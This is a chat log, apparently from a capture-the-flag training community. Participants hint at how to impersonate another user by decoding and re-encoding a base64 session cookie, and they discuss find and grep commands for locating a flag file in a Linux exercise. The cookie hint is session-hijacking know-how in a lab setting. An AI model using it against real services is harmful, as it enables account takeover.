You know how the server tracks sessions, try becoming that user
I tried editing the cookie but it didn't work xD
Then you didn't quite do it right
Make sure there isn't a 7 in your fixed part
If there's a 7, it's wrong
Use CyberChef to encode and decode
so it's not base64 ?
No, it is.
But if there's a 7 in the fixed part, your decoder is bad
Wait, it might not be a 7
lemme check
Yeah, if there's a 7 then it's a bad decoder
Tends to be if you're using echo "<cookie>" | base64 -d in the terminal
That throws in an extra newline
Same when re-encoding afterwards
CyberChef > all
so I need to use -n flag
You do, @sand glen
@inland onyx can I dm pls?
You may. Thank you for asking
Hi, need help with linux challenges, task4
#7 Locate and retrieve flag 26. I can't find a file named flag26, and have to use this: grep -Ril "flag26" / 2>/dev/null , it takes too long and I don't think it will find the file in a short period of time.. any hint?
That challenge wasn't well thought out, btw. The way the writeup does it is basically bruteforcing for any flags @quaint radish
so find / -name "flag26.txt" 2>/dev/null
That assumes 2 things about the flag
- That it's a .txt
- That it's even called flag26
well usually it will tell you though
at least it did for the challenge I just did
ya if it doesn't tell you the exact name of the file then just use grep
so I would do find / 2>/dev/null | grep "flag26"
so basically I have to wait until it finds flag26 in a particular file?
one second
Who says "flag26" is in the file?
.huh let me think
ya i'm not a subscriber yet so I can't see the problem
but ya just listen to ninja
he knows a lot more than me anyway
Having seen the solution in the writeup, I disagree with the challenge
